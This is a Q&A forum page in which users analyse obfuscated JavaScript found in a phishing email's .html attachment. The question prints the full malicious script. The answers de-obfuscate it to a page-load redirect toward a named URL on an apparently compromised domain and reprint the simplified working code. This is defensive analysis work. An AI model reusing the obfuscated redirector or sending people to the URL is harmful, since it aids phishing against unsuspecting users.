Geek Answers Handbook

What does this suspicious phishing code do?

Several of my non-IT colleagues have opened an .html attachment in an email message that looks extremely suspicious. The result was a blank screen when it turned out that some javascript code was running.

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

What did he do? This is beyond my knowledge of programming.

+6
javascript phishing
source share
4 answers

It will redirect the URL: http://lendermedia.com/images/z.htm '(follow it at your own risk).

Copy and paste the code into a decent JavaScript editor and format its source.

Key points:

 var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');

h will be equal to ' http://lendermedia.com/images/z.htm '

 t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];

t will contain a link to document.location

 b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;

A property named href of b , which at this point (inside another function) really is t from the above statement, has the value h , which is the URL.

Most of the code is simple noise, the actual functionality consists of this:

 function uK() { }; uK.prototype = { f : function() { var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^' .replace(/[\^H\!9X]/g, ''); t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')]; function x(b) { b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h; } x(t); } }; var tL = new uK(); tL.f();
+19
source share

I ran into the same problem and then found this page. Having made WHOIS for contact information, I contacted the owner of lendermedia.com, who seemed to have just learned that the z.htm page was posted on his website with his knowledge and against his wishes. At the time I contacted him, I was able to browse his /images/ directory. He has since changed permissions. All this to say that it seems that this guy is clean, but it is for you to decide.

+2
source share

Less obfuscation, it does something like document.location.href="http://lendermedia.com/images/z.htm"

0
source share

The key part is to understand that the code is the replace(/[\^H\!9X]/g, '') parts. if the second argument to replace is '' , then it simply removes the material from the previous line.

A truly inelegant way of obfuscating things. Probably the goal is to just be random for each user and avoid Bayesian spam filters.

0
source share

More articles:


All Articles